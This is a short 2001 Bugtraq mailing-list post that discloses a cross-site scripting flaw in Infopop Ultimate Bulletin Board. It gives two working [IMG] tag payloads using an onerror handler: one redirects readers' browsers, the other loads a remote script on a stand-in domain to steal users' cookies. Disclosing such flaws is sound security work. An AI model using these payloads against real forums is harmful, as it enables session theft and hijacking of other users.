Bugtraq mailing list archives
UBB vulnerablietis + about: using example
From: kyprizel <kyprizel () hostel tusur ru>
Date: Fri, 16 Nov 2001 02:10:50 +0700
Здравствуйте, уважаемый(ая) bugtraq, Posting something like this UBB tag: [IMG]http://about:test"onerror="top.location.href='http://punk.tomsk.ru';[/IMG] to Infopop Ultimate Bulletin Board, we are able to redirect users browser to http://punk.tomsk.ru There are many ways to stole cookies using this vulnerabliety, one of them: [IMG]http://about:test"onerror="this.src='http://somedomain.com/yourscript.php';[/IMG] and yourscript.php - is a script to recieve users cookies 8) -- // Э.Заитов AKA kyprizel mailto:kyprizel () hostel tusur ru ICQ#3337333 -- "Knowlege itself is power..." F.Bacon --
Current thread:
- UBB vulnerablietis + about: using example kyprizel (Nov 15)
- <Possible follow-ups>
- Re: UBB vulnerablietis + about: using example David Dreezer (Nov 15)